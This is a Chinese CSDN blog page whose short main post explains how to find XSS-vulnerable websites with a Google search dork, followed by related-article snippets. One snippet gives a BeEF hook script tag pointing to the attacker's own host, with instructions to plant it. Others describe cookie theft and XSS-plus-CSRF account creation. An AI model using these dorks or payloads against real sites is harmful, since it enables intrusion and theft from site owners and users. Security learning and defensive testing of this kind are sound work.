xss基础之xss网站找寻

最新推荐文章于 2023-07-25 17:53:26 发布
最新推荐文章于 2023-07-25 17:53:26 发布
阅读量2.8k 收藏 9
点赞数
分类专栏: 科研项目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiangliuzheng/article/details/51910531
版权

1、通过google搜索xss网站

关键字:inurl: asp?bigclassname

原理:要懂得bigclassname参数是网站显示的目录等参数,一般会在网页中显示出相应的参数内容,当后台get数据时未对参数进行特殊字符进行过滤时,就有可能通过对参数进行特殊赋值,插入脚本语句就能产生出执行脚本的功能。同样的参数可以还有name、product等,不过要根据实际情况


3、有时候,虽然xss注入成功了,但是浏览器的问题不会显示出脚本,建议用狐火浏览器ok这节就到这里咯



天空里的飞鸟
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss实现获取网站源码
weixin_30600503的博客
01-12 681
网站cookie设置了httponly,xss获取不到到网站的cookie。但是我们是可以获取到网站后台的url。 这时候我们可以xss得到网站后台源码,从而找到网站后台的一些敏感操作:添加用户,删除用户,修改密码,数据库备份等等。 在这个xss点上,用ajax构造post数据包,添加用户。这就应该是xss+csrf的利用。 最近开发我们学校的党建系统,下面我们来复现一下上面操作...
前端安全之XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
Xss 网站跨站脚本安全技术
04-01
xss 网站跨站脚本的技术指南,详细描述了跨站脚本的集中不同的类型和危害网站的原理
XSS数据接收网站——XSS在线平台
p36273的博客
06-17 3471
平台的网址是:链接:XSS在线平台。
使用Fiddler的X5S插件查找XSS漏洞
2301_77512689的博客
05-03 369
这里需要先说明的是,该工具不是自动化工具,只是列出哪里可能存在XSS漏洞,所以要使用该 工具,读者需要了解XSS,知道什么样的编码可能导致产生XSS漏洞。另外,读者需要知道的是,该工具基本上只能检测反射型XSS问题,不能检测基于DOM的XSS漏洞,也不能检测存储型XSS,因为这种漏洞的数据不会在请求和响应的参数中出现。同时该工具花费的时间也比较长,因为我们必须手动检测每个URL,有可能错过某个包含XSS漏洞的页面,就没办法对这个页面进行检测了,因此也有可能在浪费了大量时间后因软件的局限性没有发现漏洞。
手动挖掘XSS漏洞
LJH1999ZN的博客
02-17 2578
一、xss注入的思路 在目标网站找到注入的点,例如注册,留言,搜索,提交,评论等页面 在注入点输入一些字符,' " < > script alert javascript,点击提交查看是否被过滤。 通过未过滤的语句判断是否可以进行js代码的编写 提交构造的脚本,或者通过绕过的方式查看源码,判断是否存在xss漏洞 一般查询接口、用户登录、搜索、订单提交容易出现反射型XSS,留言板、评论、用户昵称、用户信息等凡是可以提交数据由服务器进行存储和显示的位置都有可能出现存储型跨站容易出现存储型X
渗透测试面试问题合集
AiENG_07的博客
05-25 1778
a、服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等)b、网站指纹识别(包括,cms,cdn,证书等),dns记录c、whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等)e、子域名收集,旁站,C段等f、google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等g、扫描网站目录结构,爆后台,网站banner,测试文件,备份等敏感文件泄漏等h、传输协议,通用漏洞,exp,github源码等。
xss学习之查找xss(一)
weixin_34186128的博客
02-10 133
从本章开始学习xss 如何查找xss: 拿到一个网站之后,随便找一个页面测试下 http://xss.com/product/product_searchProducts.action?productName=111 查看页面源代码为: <input id="productName" name="productName" class="search_text" type="...
Web安全性测试之XSS
01-31
XSS 全称(CrossSiteScripting)跨站脚本...比如获取用户的Cookie,导航到恶意网站,携带木马等。 作为测试人员,需要了解XSS的原理,攻击场景,如何修复。才能有效的防止XSS的发生。假如有下面一个textbox<inputtype=
Web安全测试之XSS实例讲解
09-01
本文主要介绍Web安全测试之XSS,这里详细整理了测试XSS的资料,并附示例代码和详细讲解,有需要的小伙伴可以参考下
XSS攻击检测
01-22
XSS攻击检测代码,删除bin生成的class,直接使用src加载.java 就好了,开发采用的myeclipse,使用其他工具的注意修改,
xss防御之php利用httponly防xss攻击
12-19
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)...
XSS平台与cookie获取
永远是少年
11-21 1044
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台与cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
xss漏洞之——XSS平台搭建
wsnbbz的博客
03-04 4888
前言 经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个: 1.kali下的beef (1)kali命令行里输入beef-xss,得到一个脚本 <script src="http://127.0.0.1:3000/hook.js"></script> 将127.0.0.1改为kali的ip,之后进行植入 (2)kali...
遇到了一个存在XSS(存储型)漏洞的网站
最新发布
weixin_64311421的博客
07-25 989
网站的漏洞
教大家如何找XSS漏洞并且利用
liuhyusb的博客
06-19 1199
cross sitescript跨站脚本攻击,为了避免和css重复,就叫XSS了,是客户端脚本安全中的头号大敌。
XSS攻击
一种感觉的博客
07-14 555
XSS攻击1.XSS攻击原理2.如何防御? 1.XSS攻击原理 常见的 XSS 攻击有三种:反射型XSS攻击、DOM-based 型XXS攻击以及存储型XSS攻击。 1).反射型XSS攻击反射型 XSS 一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个包含恶意代码的 URL,当受害者点击这些专门设计的链接的时候,恶意代码会直接在受害者主机上的浏览器执行。反射型XSS通常出现在网站的搜索栏、用户登录口等地方,常用来窃取客户端 Cookies 或进行钓鱼欺骗。 2).存储型XSS攻击:主要将XSS代码
我来教你如何寻找XSS漏洞
MyDriverC
12-16 9038
http://blog.sina.com.cn/s/blog_68d342d90100nh7b.html 今天本来在看一个站,偶然发现存在XSS漏洞,就留意了下URL形式,然后谷歌一下,就不费什么力气的得到了大量存在XSS漏洞的站点页面,正好今天闲来无事,我也得给我的博客写点东西,不然又要被搜索引擎惩罚了… 这里,简单说一下如何寻找XSS漏洞,一般的,我在浏览网站时,发现URL中存
【漏洞学习——XSS】Edmodo网站XSS漏洞
Fly_鹏程万里
03-07 923
各位漏洞猎人好! 在这篇文章中,我将告诉你我是如何在Edmodo(一个教育互动平台)发现XSS的。 这个漏洞是我一个月前发现的。Parth Shah写的一篇关于存储型XSS的文章启发了我。 在我浏览edmodo.com网站时,发现了以前从未见过的URL,页面只有一个登录页面和一个简单且过时的布局。嗯,看样子可能存在漏洞。所以,让我们开始吧! 那个页面的URL如下: 目标URL:ht...
渗透测试 ,XSS基础知识
07-23
XSS(Cross-Site Scripting)是一种常见的网站安全漏洞,攻击者通过在网页中注入恶意脚本来攻击用户。以下是关于 XSS基础知识: 1. XSS 的原理:XSS 攻击利用了网站对用户输入的信任,攻击者将恶意脚本注入到网页中,当用户浏览该网页时,恶意脚本会在用户的浏览器中执行,从而达到攻击的目的。 2. XSS 的分类:XSS 可以分为三种主要类型:存储型(Stored XSS)、反射型(Reflected XSS)和 DOM 型(DOM-based XSS)。存储型 XSS 注入的恶意脚本被存储在目标网站的数据库中,当其他用户访问该页面时,恶意脚本会被执行。反射型 XSS 注入的恶意脚本通过 URL 参数传递给目标网站,目标网站在返回的页面中直接输出了这些恶意脚本,用户点击链接时脚本被执行。DOM 型 XSS 则是利用了网页的 DOM 结构,通过修改 DOM 中的内容来触发漏洞。 3. XSS 的危害:XSS 攻击可以导致许多危害,包括盗取用户的敏感信息(如用户名、密码、cookie)、篡改网页内容、进行钓鱼攻击、传播恶意软件等。 4. 防御 XSS 的措施:为了防止 XSS 攻击,可以采取以下措施: - 输入验证和过滤:对用户输入的数据进行验证和过滤,过滤掉不可信的字符和脚本。 - 输出转义:将用户输入的数据进行转义,确保输出到网页时不会被浏览器解析为可执行的脚本。 - 使用 HTTP 头部中的 Content Security Policy(CSP)来限制网页的资源加载和执行。 - 设置 HttpOnly 属性来限制 JavaScript 对 cookie 的访问。 - 定期更新和修复网站的漏洞,以防止攻击者利用已知的 XSS 漏洞。 以上是关于 XSS基础知识,深入了解 XSS 攻击的原理和防御措施对于网站安全至关重要。在进行渗透测试时,理解 XSS 的工作原理和常见漏洞场景可以帮助你更好地发现和利用 XSS 漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值